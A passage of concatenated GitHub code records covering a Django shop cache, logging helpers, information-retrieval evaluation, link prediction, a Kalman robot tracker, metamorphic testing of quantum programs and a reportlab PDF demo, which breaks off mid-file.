model._meta.model_name != 'imagesproductsshop' else None\n\n queryset = model.objects.filter(**kwargs)\n\n if order_by_field:\n queryset = queryset.order_by(order_by_field)\n\n return cache.get_or_set(\n f'{model._meta.model_name}_filter_{name}',\n lambda: queryset,\n cache_time\n )\n\n\ndef annot(model):\n\n p = model.objects.select_related('group__category').all()\n from django.urls import reverse\n\n # Пройдитесь по queryset и создайте URL для каждого объекта\n for product in p:\n product.url = reverse('shop:product', kwargs={\n 'slug_category': product.group.category.slug,\n 'slug_group': product.group.slug,\n 'slug': product.slug\n })\n\n return p\n\n\ndef cache_product_all_annot(model):\n\n cached_data = cache.get(f'{model._meta.model_name}_all_annot_url')\n\n if cached_data is not None:\n return cached_data\n data = annot(model)\n cache.set(f'{model._meta.model_name}_all_annot_url', data, cache_time)\n\n return data\n\n\ndef get_test_data(model=None):\n\n if not model:\n return cache.get('product_test_site_name')\n else:\n return cache.get_or_set(\n f'{model._meta.model_name}_test_site_name',\n lambda: model.objects.all().values_list('site_name', flat=True),\n cache_time\n )\n","repo_name":"Dmitrii-ru/shop","sub_path":"shop/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40392643848","text":"#!usr/bin/python\n#-*- coding:utf-8 -*-\n\nimport logging\nimport datetime\nimport os\nimport sys\nfrom logging.handlers import RotatingFileHandler\nfrom PublicMethod import *\n\n\nclass Log(object):\n\n logger = None\n\n @classmethod\n def create_log_file(cls):\n logfile = '%s/%s.log' % (os.path.abspath('./log'),get_format_currenttime())\n\n cls.logger = logging.getLogger(__name__)\n cls.logger.setLevel(logging.DEBUG)\n\n # 文件handler\n filehandle = RotatingFileHandler(logfile, maxBytes=50*1024*1024, backupCount=5, encoding=\"UTF-8\")\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n filehandle.setFormatter(formatter)\n cls.logger.addHandler(filehandle)\n\n # 屏幕handler\n console = logging.StreamHandler()\n formatter = logging.Formatter('%(asctime)s : %(message)s')\n console.setFormatter(formatter)\n cls.logger.addHandler(console)\n\nif __name__=='__main__':\n Log.create_log_file()\n Log.logger.debug('this is a debug msg')\n Log.logger.info('this is a info msg')\n","repo_name":"h080294/appium_python_android","sub_path":"common/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"77"} +{"seq_id":"74091454968","text":"import torch\nimport matplotlib.pyplot as plt\n\nimgs = torch.load('imgs.pt')\nseg = torch.load('seg.pt')\npseg = torch.load('pseg.pt')\n\nprint(imgs[0][0].shape)\nprint(seg.shape)\nprint(pseg.shape)\n\n#gt1 = torch.argmax(pseg[0], dim=0).detach().cpu().numpy()\n#plt.imshow(gt1, cmap='gray')\n#plt.savefig(\"gt1.png\")","repo_name":"mtsysin/LaneDetection","sub_path":"segmentation_postprocess.py","file_name":"segmentation_postprocess.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39064343438","text":"# Напишите программу на Python, которая будет находить сумму элементов массива из 1000000 целых чисел.\r\n# пример массива: arr = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, ...]\r\n# массив должен быть заполнен случайными целыми числами от 1 до 100.\r\n# при решении задачи нужно использовать многопоточность, многопроцессорность и асинхронность.\r\n# в каждом решении нужно вывести время выполнения вычислений.\r\n\r\nimport asyncio,time,random\r\n\r\nmassive=[random.randint(1, 101) for _ in range(1000000)]\r\nsum=0\r\nasync def summa(arr):\r\n global sum\r\n for i in arr:\r\n sum+=i\r\n\r\n\r\nif __name__=='__main__':\r\n\r\n start_time=time.time()\r\n tasks=[]\r\n for i in range(10):\r\n start_index=i*100000\r\n end_index=start_index+100000\r\n task =asyncio.ensure_future(summa(massive[start_index:end_index]))\r\n tasks.append(task)\r\n\r\n loop = asyncio.get_event_loop()\r\n loop.run_until_complete(asyncio.wait(tasks))\r\n print(f'async >>> {sum} time>>> {time.time()-start_time}')\r\n","repo_name":"AlexKri72/Flask","sub_path":"Lesson04/lesson04_8.py","file_name":"lesson04_8.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24891978842","text":"'''\na program for evaluating the quality of search algorithms using the vector model\n\nit runs over all queries in query.text and get the top 10 results,\nand then qrels.text is used to compute the NDCG metric\n\nusage:\n python batch_eval.py index_file query.text qrels.text n\n\n output is the average NDCG over all the queries for boolean model and vector model respectively.\n\talso compute the p-value of the two ranking results. \n'''\n#import re\nimport scipy\nfrom scipy import stats\nimport cran\nimport metrics\nfrom cranqry import loadCranQry\nfrom index import InvertedIndex\nfrom query import *\n\n\ndef process_querls_file(qrels_file,queries_id_list):\n qrels_dic={}\n f=open(qrels_file,'r').read()\n row=f.split(\"\\n\")\n #print(row)\n for x in row:\n if(x==''):\n break\n record=x.split(' ')\n quer_id=record[0]\n doc_id=record[1]\n if(quer_id in qrels_dic.keys()):\n qrels_dic[quer_id].append(doc_id)\n else:\n qrels_dic[quer_id]=[doc_id]\n #print(qrels_dic)\n #ignore the query_ids from querls.text which are not in query.text\n #print(queries_id_list)\n #print(qrels_dic)\n #print(len(qrels_dic.keys()))\n #print(queries_id_list.__len__())\n temp_dict = dict()\n k=0\n for x in qrels_dic.keys():\n newkey=queries_id_list[k]\n temp_dict[newkey] = qrels_dic[x]\n k+=1\n #temp_dict=dict(qrels_dic)\n # for x in temp_dict.keys():\n # if x not in queries_id_list:\n # del qrels_dic[x]\n #print(temp_dict)\n return temp_dict\n\ndef eval(index_file,query_file,qrels_File,number_of_queries):\n #read queryfile,indexfile\n # ToDo\n queries = loadCranQry(query_file)\n queries_id_list=[str(int(x)) for x in queries.keys()]\n #print(queries_id_list)\n #read querls.txt\n qrels_dict=process_querls_file(qrels_File,queries_id_list)\n inputdocument = cran.CranFile(\"cran.all\")\n # load the index file saved at from part 1\n index = InvertedIndex().load(index_file)\n qp = QueryProcessor(queries, index, inputdocument, number_of_queries)\n queries_id_list_int=[int(x) for x in qrels_dict.keys()]\n queries_id_ls = [int(x) for x in queries.keys()]\n #IdeaVectorsforQuery_ids={}\n sumbooleanNADC=[]\n sumvectorNADC=[]\n with open('Evaluation_search.csv', 'w') as f:\n f.write(\"%s,%s,%s,%s\\n\" % (\"Iteration\", \"AverageNDCG-booleanModel\", \"AverageNDCG-vectorModel\",\"P-value\"))\n for i in range(0,5):\n vectorNADC=[]\n booleanNADC=[]\n intersection_queries=list(set(queries_id_list_int) & set(queries_id_ls))\n random_query_id_list = random.sample(queries_id_list_int, number_of_queries)\n #random_query_id_list=[153, 18]\n #print(random_query_id_list)\n for q_id in random_query_id_list:\n print(\"Processing for Query ID ::\",q_id)\n qp.querynumber=q_id\n #boolean_res=qp.booleanQuery()\n vector_top3=qp.vectorQuery(5)\n #vector_top3=[('12',0.34),('746',0.33),('875',0.24)]\n #print(boolean_res)\n print(\"Output for Vector Model Result::\",vector_top3)\n if(vector_top3.__len__()<1):\n vectorNADC.append(0)\n else:\n vector_label=[x[0] for x in vector_top3]\n score=[x[1] for x in vector_top3]\n print(\"DocumentIDs of Vector Model Result:: \",vector_label)\n print(\"Scores of Vector Model Result::\",score)\n true_label=vector_label.copy()\n query_id=str(q_id)\n for x in vector_label:\n #str_x=\"{0:0=3d}\".format(x)\n ind=vector_label.index(x)\n if (x in qrels_dict.get(query_id)):\n true_label[ind]=1\n else:\n true_label[ind]=0\n if true_label.__len__()<5:\n len_val=10-(true_label.__len__())\n true_label.extend([0]*len_val)\n print(\"Actual Vector:: \",true_label)\n print(\"Predicted Vector:: \",score)\n if sum(true_label)==0 :\n vectorNADC.append(0)\n else:\n ndcg=metrics.ndcg_score(true_label, score,5)\n print(\"Calculated ndcg for Vector::\",ndcg)\n vectorNADC.append(ndcg)\n boolean_res = qp.booleanQuery()\n print(\"output of boolean_res:: \",boolean_res)\n if boolean_res.__len__()<1:\n booleanNADC.append(0)\n else:\n score=[1]*len(boolean_res)\n if(score.__len__()<5):\n leng=5-(score.__len__())\n score.extend([0]*leng)\n true_label = boolean_res.copy()\n query_id = str(q_id)\n for x in boolean_res:\n ind = boolean_res.index(x)\n if (x in qrels_dict.get(query_id)):\n true_label[ind] = 1\n else:\n true_label[ind] = 0\n if true_label.__len__() < 5:\n len_val = 10 - (true_label.__len__())\n true_label.extend([0] * len_val)\n print(\"Actual boolean:: \", true_label)\n print(\"Predicted boolean:: \", score)\n if sum(true_label) == 0:\n booleanNADC.append(0)\n else:\n ndcg = metrics.ndcg_score(true_label, score, 5)\n print(\"Calculated ndcg for Boolean::\", ndcg)\n booleanNADC.append(ndcg)\n print(\"Calculated NADC sum for all queries\",vectorNADC)\n avergae_vectorNADC=float(sum(vectorNADC)/number_of_queries)\n print(\"Calculated NADC sum for all queries\",booleanNADC)\n avergae_booleanNADC=float(sum(booleanNADC)/number_of_queries)\n print(\"Avergae NADC Vector::\",avergae_vectorNADC)\n print(\"Avergae NADC boolean::\",avergae_booleanNADC)\n p_value=scipy.stats.wilcoxon(vectorNADC, booleanNADC, zero_method='wilcox', correction=False)\n print(i,str(avergae_booleanNADC),str(avergae_vectorNADC),str(p_value[1]))\n p=\"%.20f\" % float(str(p_value[1]))\n print('P value for all the queries processed is:',p)\n f.write(\"%s,%s,%s,%s\\n\" % (i+1, str(avergae_booleanNADC), str(avergae_vectorNADC),str(p)))\n print('Done')\n\nif __name__ == '__main__':\n #eval('index_file', 'query.text', 'qrels.text', 50)\n eval(str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), int(sys.argv[4]))\n #eval()\n","repo_name":"saisri09/Information_Retrivel","sub_path":"prj1/batch_eval.py","file_name":"batch_eval.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20092373356","text":"import time\r\nimport os\r\nimport Initialize\r\nimport Evaluation_Indicators.AUC\r\n\r\n\r\nimport similarity_indicators.CommonNeighbor\r\nimport similarity_indicators.Jaccard\r\nimport similarity_indicators.PA\r\nimport similarity_indicators.AA\r\nimport similarity_indicators.HDI\r\nimport similarity_indicators.HPI\r\n\r\nimport similarity_indicators.Katz\r\nimport similarity_indicators.ACT\r\n\r\nstartTime = time.time_ns()\r\n#Initialize the training test set\r\n\r\nREADME1 = '''Please choose a DataSet:\r\n WIKI 1\r\n FACEBOOK 2\r\n EMAIL-EU 3'''\r\n\r\nprint(README1)\r\nSet = int(input('Input Set:'))\r\nif Set == 1:\r\n NetFile = u'Data/WIKI.txt'\r\n NetName = 'WIKI'\r\nelif Set == 2:\r\n NetFile = u'Data/FACEBOOK.txt'\r\n NetName = 'FACEBOOK'\r\nelif Set == 3:\r\n NetFile = u'Data/EMAIL-EU.txt'\r\n NetName = 'EMAIL-EU'\r\nelse:\r\n print('Input Error')\r\n\r\nprint (\"\\nLink Prediction start:\\n\")\r\nTrainFile_Path = 'Data\\\\'+NetName+'\\\\Train.txt'\r\nif os.path.exists(TrainFile_Path):\r\n Train_File = 'Data\\\\'+NetName+'\\\\Train.txt'\r\n Test_File = 'Data\\\\'+NetName+'\\\\Test.txt'\r\n MatrixAdjacency_Train,MatrixAdjacency_Test,MaxNodeNum = Initialize.Init2(Test_File, Train_File)\r\nelse:\r\n MatrixAdjacency_Net,MaxNodeNum = Initialize.Init(NetFile)\r\n MatrixAdjacency_Train,MatrixAdjacency_Test = Initialize.Divide(NetFile, MatrixAdjacency_Net, MaxNodeNum,NetName)\r\n\r\n#Similarity matrix calculation\r\n\r\n# README = '''\\nPlease choose a method:\r\n# CN 0\r\n# Jaccard 1\r\n# PA 2\r\n# AA 3\r\n# Katz 4\r\n# ACT 5'''\r\n# print (README)\r\n# Method = int(input('Input Method:'))\r\n\r\n# Matrix_similarity = similarity_indicators.Cos.ACT(MatrixAdjacency_Train)\r\n\r\nprint('--------------------Node based similarity--------------------')\r\nprint('----------Common Neighborhood----------')\r\nMatrix_similarity = similarity_indicators.CommonNeighbor.Cn(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------Jaccard----------')\r\nMatrix_similarity = similarity_indicators.Jaccard.Jaccards(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------Prefential Attachment----------')\r\nMatrix_similarity = similarity_indicators.PA.PA(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\n#print('----------Adamic Adar----------')\r\n#Matrix_similarity = similarity_indicators.AA.AA(MatrixAdjacency_Train)\r\n#Evaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------HDI----------')\r\nMatrix_similarity = similarity_indicators.HDI.HDI(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------HPI----------')\r\nMatrix_similarity = similarity_indicators.HPI.HPI(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('--------------------Path based similarity--------------------')\r\nprint('----------Katz----------')\r\nMatrix_similarity = similarity_indicators.Katz.Katz(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\nprint('----------Commute Time----------')\r\nMatrix_similarity = similarity_indicators.ACT.ACT(MatrixAdjacency_Train)\r\nEvaluation_Indicators.AUC.Calculation_AUC(MatrixAdjacency_Train, MatrixAdjacency_Test, Matrix_similarity, MaxNodeNum)\r\n\r\n\r\n\r\nendTime = time.time_ns()\r\nprint(\"\\nRunTime: %f s\" % (endTime - startTime))\r\n","repo_name":"Indaneboi/Link-Prediction","sub_path":"LinkPrediction.py","file_name":"LinkPrediction.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44024057881","text":"import requests\nimport json\nimport os\n\n\nclass RequestBuilder:\n def __init__(self, base_api, cache_dir=\"../data\"):\n self.CACHE_DIR = cache_dir\n self.BASE_API = base_api\n self.PWD = os.getcwd()\n\n def make_and_cache_request(\n self, endpoint: str, cache_name: str, overwrite: bool = False\n ) -> dict:\n\n cache = f\"{self.PWD}/{self.CACHE_DIR}/{cache_name}.json\"\n\n if os.path.isfile(cache) and not overwrite:\n print(f\"Reading from cache {cache}\")\n with open(cache, \"r\") as f:\n return json.load(f)\n\n else:\n print(f\"Saving and reading from response to {cache}\")\n\n try:\n req = f\"{self.BASE_API}{endpoint}\"\n res = requests.get(req)\n except:\n raise Exception(\"Invalid request\")\n\n try:\n with open(cache, \"w\") as f:\n json.dump(res.json(), f, ensure_ascii=False, indent=4)\n except:\n raise Exception(\"Unable to write to cache\")\n\n return res.json()\n","repo_name":"raviraina/pynhlstats","sub_path":"src/request_builder.py","file_name":"request_builder.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6825325521","text":"'''\nName: Ronald Alberto Carrillo Garvin\nDate: 09-07-2022\nDescription: Program that calculates the means and standard deviation of a series of data stored in a flat file.\n'''\n\nimport math\ndatos1 = list()\ndatos2 = list()\n\ntry:\n archivo = open('datos.txt', mode='r', encoding='utf-8-sig')\n \n sumatoria = 0.0\n sumatoria2 = 0.0\n for linea in archivo:#Recorrido de cada uno de las listas\n\n fila = linea.split(\" \")\n datos1.append(float(fila[0]))\n datos2.append(float(fila[1]))\n \n sumatoria += float(fila[0])\n sumatoria2 += float(fila[1])\n \n archivo.close()\n \n promedio = sumatoria / len(datos1)\n promedio2 = sumatoria2 / len(datos2)\n \n varianza = 0.0\n for i in range(len(datos1)):\n varianza += ((datos1[i]-promedio) * (datos1[i]-promedio))\n \n varianza2 = 0.0\n for i in range(len(datos1)):\n varianza2 += ((datos2[i]-promedio2) * (datos2[i]-promedio2))\n \n desviacion = math.sqrt(varianza/(len(datos1)-1))\n desviacion2 = math.sqrt(varianza2/(len(datos2)-1))\n \n print(\"--------------\")\n print(\"Mean - Std. Dev\")\n print(f\"{round(promedio,2)} {round(desviacion,2)}\")\n print(f\"{round(promedio2,2)} {round(desviacion2,2)}\")\n\nexcept ValueError:\n print(\"Error, ingresó un valor no numérico.\")\nexcept FileNotFoundError:\n print(\"Error, el archivo de datos no está disponible.\")\nexcept ZeroDivisionError:\n print(\"Error, division por cero.\")\nexcept TypeError:\n print(\"Error en el tipo de dato.\")\nexcept IndexError:\n print(\"Falta una columna para realizar los calculos.\")\n","repo_name":"maosierra/pythonexamples","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20122286043","text":"import tkinter as tk\nimport random\nfrom datetime import datetime\nimport time\nimport math\n\n\ndef mouse_function(event):\n time.sleep(1)\n myCanvas.create_oval(randx, randy, randx + 100, randy + 100, fill='red')\n myCanvas.bind(\"\", mouse_function2)\n mouse_function.currenttime1 = datetime.now()\n\n\ndef mouse_function2(event):\n if event.x >= randx and event.y >= randy and event.x <= randx + 100 and event.y <= randy + 100:\n currenttime2 = datetime.now()\n\n print(\"time it took you to hit: \", currenttime2 - mouse_function.currenttime1)\n\n\nroot = tk.Tk()\nmyCanvas = tk.Canvas(root, bg=\"white\", height=300, width=300)\nmyCanvas.bind(\"\", mouse_function)\nsleep = random.randint(2,3)\nclickcount = 0\nstarttime = 0\nrandx = random.randint(0,200)\nrandy = random.randint(0,200)\n\n\nmyCanvas.pack()\n\n\nroot.mainloop()\n\n\n\n","repo_name":"mwaloszek55/Year2","sub_path":"Sem1/Programming/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17408401531","text":"import argparse\nfrom util import readData\nfrom kalman_filter import predict\nimport time\ndef main():\n parser = argparse.ArgumentParser(description='Robot Tracker')\n parser.add_argument('input_filename', type=str, help='input file name')\n parser.add_argument('-o', '-output_filename', type=str, default='prediction.txt', help='output file name')\n parser.add_argument('-v', '--visualize', type=bool, default=False, help='whether to visualize output')\n parser.add_argument('-t', '--test', type=bool, default=False, help='use the last 2 seconds of the file as a test and outputs predicted error')\n args = parser.parse_args()\n data = readData(args.input_filename)\n trainingData = data\n testData = None\n if args.test:\n # If in testing mode, we want to use the last 60 frames as test data\n trainingData = data[:-60]\n testData = data[len(data)-60:]\n predictions = predict(trainingData,args.visualize)\n assert len(predictions) == 60\n with open(args.o, 'w') as f:\n for element in predictions:\n f.write(\"%d,%d\\n\" % (element[0], element[1]))\n\n\n\nif __name__ == '__main__':\n #x = time.clock()\n main()\n #print time.clock() - x\n","repo_name":"vipergts24/CS8803_Final_Project","sub_path":"finalproject/finalproject.py","file_name":"finalproject.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"689032137","text":"import ast\nfrom copy import deepcopy\nfrom functools import reduce\nimport numpy as np\nimport re\nfrom typing import List, Tuple, Dict, Any\n\nfrom lib.mr import MetamorphicTransformation\n\nimport lib.metamorph as metamorph\nfrom lib.qfl import detect_divergence\n\n\nclass ChangeBackend(MetamorphicTransformation):\n\n def check_precondition(self, code_of_source: str) -> bool:\n return metamorph.check_get_backend(code_of_source)\n\n def is_semantically_equivalent(self) -> bool:\n return True\n\n def derive(self, code_of_source: str) -> str:\n \"\"\"Change the backend used in the source code.\n\n Args:\n source_code: The source code of the circuit.\n available_backends: available backends to use.\n\n Returns:\n The source code of the circuit with the backend changed.\n \"\"\"\n available_backends = self.mr_config[\"available_backends\"]\n sections = metamorph.get_sections(code_of_source)\n execution_section = sections[\"EXECUTION\"]\n mr_metadata = {}\n\n tree = ast.parse(execution_section)\n\n class BackendChanger(ast.NodeTransformer):\n\n def __init__(self, available_backends: List[str]):\n self.available_backends = deepcopy(available_backends)\n\n def visit_Call(self, node):\n if (isinstance(node, ast.Call) and\n isinstance(node.func, ast.Attribute) and\n node.func.attr == \"get_backend\" and\n isinstance(node.args[0], ast.Constant)):\n if node.args[0].value in self.available_backends:\n self.available_backends.remove(node.args[0].value)\n target_backend = np.random.choice(self.available_backends)\n print(f\"Follow: replace backend {node.args[0].value} -> \" +\n f\"{target_backend}\")\n mr_metadata[\"initial_backend\"] = str(node.args[0].value)\n mr_metadata[\"new_backend\"] = str(target_backend)\n node.args[0].value = target_backend\n return node\n\n backend_changer = BackendChanger(available_backends)\n modified_tree = backend_changer.visit(tree)\n changed_section = metamorph.to_code(modified_tree)\n sections[\"EXECUTION\"] = changed_section\n\n self.metadata = mr_metadata\n\n return metamorph.reconstruct_sections(sections)\n\n def check_output_relationship(\n self,\n result_a: Dict[str, int],\n result_b: Dict[str, int]) -> bool:\n \"\"\"Check that the two results are equivalent.\"\"\"\n exec_metadata = {\n \"res_A\": result_a,\n \"res_B\": result_b\n }\n detectors = self.detectors\n return detect_divergence(exec_metadata, detectors)\n","repo_name":"sola-st/MorphQ-Quantum-Qiskit-Testing-ICSE-23","sub_path":"lib/mr/change_backend.py","file_name":"change_backend.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14118235703","text":"class Solution:\n def findRelativeRanks(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[str]\n \"\"\"\n if not nums:\n return []\n #newnums = sorted(list(set(nums)),reverse=True)\n #all the scores of athletes are guaranteed to be unique\n newnums = sorted(nums,reverse = True)\n dic = {}\n l = len(newnums)\n dic[newnums[0]] = \"Gold Medal\"\n if l>1:\n dic[newnums[1]] = \"Silver Medal\"\n if l>2:\n dic[newnums[2]] = \"Bronze Medal\" \n for i in range(3,len(newnums)):\n dic[newnums[i]] = str(i+1)\n res = [dic[k] for k in nums]\n return res","repo_name":"siyile/leetcode","sub_path":"src/UpTo550/Problem506.py","file_name":"Problem506.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"10987199441","text":"\nimport logging\n\n# ==============================================================================\n# The default logger root is used whenever the logging module's functions are\n# called directly.\n#\n# Define your own logger by creating an object of the Logger class.\n# ==============================================================================\n\n# ==============================================================================\n# Logger: Class whos objects will be used in the application code directly to\n# call the functions\n#\n# LogRecord: Auto created by Loggers. Have all the info related to the event\n# being logged.\n#\n# Handler: Send the LogRecord to the required output destination like the\n# console or a file. Its the base for subclasses like StreamHandler,\n# FileHandler, SMTPHandler, HTTPHandler\n#\n# Formatter: Where you specify the format of the output by specifying a string\n# format that lists out the attributes that the output should contain.\n# ==============================================================================\n\n# ==============================================================================\n# Instantiate the Logger class using logging.getLogger(name)\n# Multiple calls to getLogger() with the same name will return a reference to\n# the same Logger object.\n#\n# It is recommended that we use module-level loggers by passing __name__ as\n# the name parameter to getLogger()\n# ==============================================================================\n\n\ndef log_test1():\n logger = logging.getLogger('example_logger')\n logger.warning('This is a warning')\n logger2 = logging.getLogger(__name__)\n logger2.warning('This is another warning')\n\n# ==============================================================================\n# Unlike the root logger, custom loggers can't be configured using\n# basicConfig()\n#\n# Like loggers, you can set the severity level in handlers... useful if you\n# want to set multiple handlers for the same logger but want different severity\n# levels for each of them. E.g. warnings logged to the console but everything\n# to a file.\n# ==============================================================================\n\n\ndef log_test2():\n logger = logging.getLogger(__name__)\n\n c_handler = logging.StreamHandler()\n f_handler = logging.FileHandler('app.log', mode='w')\n\n c_handler.setLevel(logging.WARNING)\n f_handler.setLevel(logging.ERROR)\n\n c_format = logging.Formatter('%(name)s :: %(levelname)s :: %(message)s')\n f_format = logging.Formatter('%(asctime)s :: %(name)s :: %(levelname)s :: %(message)s')\n\n c_handler.setFormatter(c_format)\n f_handler.setFormatter(f_format)\n\n logger.addHandler(c_handler)\n logger.addHandler(f_handler)\n\n logger.warning('This is a warning')\n logger.error('This is an error')\n\n\n# ==============================================================================\n# todo: continue with tutorial here...\n# https://realpython.com/python-logging/\n# Other Configuration methods\n# ==============================================================================\ndef log_test3():\n logger = logging.getLogger(__name__)\n\n f_handler = logging.FileHandler('app.log', mode='w')\n\n f_handler.setLevel(logging.DEBUG)\n\n logger.addHandler(f_handler)\n\n logger.debug('debug mesg')\n logger.info('info mesg')\n logger.warning('warning mesg')\n logger.error('error mesg')\n\ndef log_test4():\n ...\n\ndef log_test5():\n ...\n\ndef log_test6():\n ...\n\ndef log_test7():\n ...\n\nswitch = {\n 'test1': log_test1,\n 'test2': log_test2,\n 'test3': log_test3,\n 'test4': log_test4,\n 'test5': log_test5,\n 'test6': log_test6,\n 'test7': log_test7\n}\n\nrunme = 'test3'\n\nswitch[runme]()\n\n\n\n","repo_name":"spelee/python_edu","sub_path":"tutorials/learnlog/mytest3a.py","file_name":"mytest3a.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70545363128","text":"import requests\n\nclass TestFirstAPI:\n def test_hello_header(self):\n url = \"https://playground.learnqa.ru/api/homework_header\"\n expected_val = 'Some secret value'\n\n response = requests.post(url)\n actual_val = response.headers['x-secret-homework-header']\n\n print(response.headers)\n assert actual_val == expected_val, f\"В ответе нет заголовка x-secret-homework-header\"","repo_name":"ale4103/LearnQA_PythonAPI","sub_path":"main/ex12_header.py","file_name":"ex12_header.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1096849542","text":"from reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\n\nfrom reportlab.lib import colors\nfrom reportlab.lib.enums import TA_CENTER, TA_LEFT\nfrom reportlab.lib.pagesizes import letter, landscape\nfrom reportlab.lib.colors import HexColor\nfrom reportlab.lib.units import inch, mm, cm\n\nfrom reportlab.platypus import Paragraph, SimpleDocTemplate, PageBreak,Image, Table, TableStyle,Spacer\nfrom reportlab.lib.styles import ParagraphStyle, getSampleStyleSheet\n\nfrom reportlab.graphics.charts.piecharts import Pie\nfrom reportlab.graphics.shapes import Drawing, Rect\nfrom reportlab.graphics.charts.textlabels import Label\n\n\n\n\n\n# 参考文档\n# pyhton之Reportlab模块 https://www.cnblogs.com/hujq1029/p/7767980.html\n\n# 注册字体\n# simsun.ttc 下载地址:https://github.com/StellarCN/scp_zh/tree/master/fonts\n#simsun.ttc 文件下载后,放在:${python_home}\\Lib\\site-packages\\reportlab\\fonts 目录下\npdfmetrics.registerFont(TTFont('SimSun', \"simsun.ttc\"))\n\ndef text_test():\n\tStyle = getSampleStyleSheet()\n\n\tbt = Style['Normal'] # 字体的样式\n\t# bt.fontName='song' #使用的字体\n\tbt.fontSize = 14 # 字号\n\tbt.wordWrap = 'CJK' # 该属性支持自动换行,'CJK'是中文模式换行,用于英文中会截断单词造成阅读困难,可改为'Normal'\n\tbt.firstLineIndent = 32 # 该属性支持第一行开头空格\n\tbt.leading = 20 # 该属性是设置行距\n\n\tct = Style['Normal']\n\tct.fontName='SimSun'\n\tct.fontSize = 12\n\tct.alignment = 1 # 居中\n\n\tct.textColor = colors.red\n\n\tt = Paragraph('你瞅啥?', bt)\n\treturn t\n\ndef autoLegender( title=''):\n\t'''\n\t\t在边框中添加文字\n\t:param title:\n\t:return:\n\t'''\n\n\twidth = 448\n\theight = 230\n\td = Drawing(width,height)\n\tlab = Label()\n\tlab.x = 220 #x和y是文字的位置坐标\n\tlab.y = 210\n\tlab.setText(title)\n\tlab.fontName = 'SimSun' #增加对中文字体的支持\n\tlab.fontSize = 20\n\td.add(lab)\n\td.background = Rect(0,0,width,height,strokeWidth=1,strokeColor=\"#868686\",fillColor=None) #边框颜色\n\n\treturn d\n\n\ndef table_model(data):\n\twidth = 7.2 # 总宽度\n\tcolWidths = (width / len(data[0])) * inch # 每列的宽度\n\n\tdis_list = []\n\tfor x in data:\n\t\t# dis_list.append(map(lambda i: Paragraph('%s' % i, cn), x))\n\t\tdis_list.append(x)\n\n\tstyle = [\n\t\t# ('FONTNAME', (0, 0), (-1, -1), 'song'), # 字体\n\t\t('FONTSIZE', (0, 0), (-1, 0), 15), # 字体大小\n\t\t('BACKGROUND', (0, 0), (-1, 0), HexColor('#d5dae6')), # 设置第一行背景颜色\n\t\t('BACKGROUND', (0, 1), (-1, 1), HexColor('#d5dae6')), # 设置第二行背景颜色\n\n\t\t# 合并 ('SPAN',(第一个方格的左上角坐标),(第二个方格的左上角坐标)),合并后的值为靠上一行的值,按照长方形合并\n\t\t('SPAN', (0, 0), (0, 1)),\n\t\t('SPAN', (1, 0), (2, 0)),\n\t\t('SPAN', (3, 0), (4, 0)),\n\t\t('SPAN', (5, 0), (7, 0)),\n\n\t\t('ALIGN', (0, 0), (-1, -1), 'CENTER'), # 对齐\n\t\t('VALIGN', (-1, 0), (-2, 